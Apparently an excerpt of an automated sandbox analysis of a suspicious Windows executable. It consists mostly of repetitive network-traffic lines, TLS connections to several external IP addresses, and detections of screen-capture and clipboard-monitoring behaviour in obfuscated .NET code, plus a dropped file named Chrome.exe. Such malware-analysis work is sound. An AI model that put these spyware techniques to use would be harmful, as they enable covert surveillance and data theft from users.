        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
        Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
        Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
        Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
        Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
        Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
        Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
        Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
        Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
        Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
        Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
        Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
        Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
        Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49712 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.89.193:443 -> 192.168.2.6:49713 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 15.204.213.5:443 -> 192.168.2.6:49721 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.6:49736 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.89.193:443 -> 192.168.2.6:49737 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49751 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 15.204.213.5:443 -> 192.168.2.6:49753 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.89.193:443 -> 192.168.2.6:49755 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.89.193:443 -> 192.168.2.6:49756 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.6:49763 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.89.193:443 -> 192.168.2.6:49765 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.89.193:443 -> 192.168.2.6:49847 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.89.193:443 -> 192.168.2.6:49936 version: TLS 1.2

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        barindex
        Contains functionality to capture screen (.Net source)
        Source: LnSNtO8JIa.exe, -----------------------------------------.cs.Net Code: _202B_202C_200F_206F_206E_202E_202D_206D_206F_200E_200F_206D_206C_200B_206E_200F_202C_202C_202C_206A_206D_206E_202E_206F_202D_202A_200C_202A_200F_206C_202D_200F_202A_202B_206E_200D_200C_206A_206D_206B_202E
        Source: Chrome.exe.0.dr, -----------------------------------------.cs.Net Code: _202B_202C_200F_206F_206E_202E_202D_206D_206F_200E_200F_206D_206C_200B_206E_200F_202C_202C_202C_206A_206D_206E_202E_206F_202D_202A_200C_202A_200F_206C_202D_200F_202A_202B_206E_200D_200C_206A_206D_206B_202E
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\LnSNtO8JIa.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
